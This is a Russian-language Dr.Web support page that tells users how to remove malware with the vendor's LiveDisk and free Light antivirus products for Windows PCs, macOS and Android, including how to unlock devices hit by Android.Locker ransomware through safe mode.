Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store .
Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light . Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
выключите устройство и включите его в обычном режиме.
Подробнее о Dr.Web для Android
Демо бесплатно на 14 дней
Выдаётся при установке
Поздравляем!
Обменяйте их на скидку до 50% на покупку Dr.Web.
Получить скидку
Скачайте Dr.Web для Android
Бесплатно на 3 месяца
Все компоненты защиты
Продление демо через AppGallery/Google Pay
Если Вы продолжите использование данного сайта, это означает, что Вы даете согласие на использование нами Cookie-файлов и иных технологий по сбору статистических сведений о посетителях. Подробнее
OK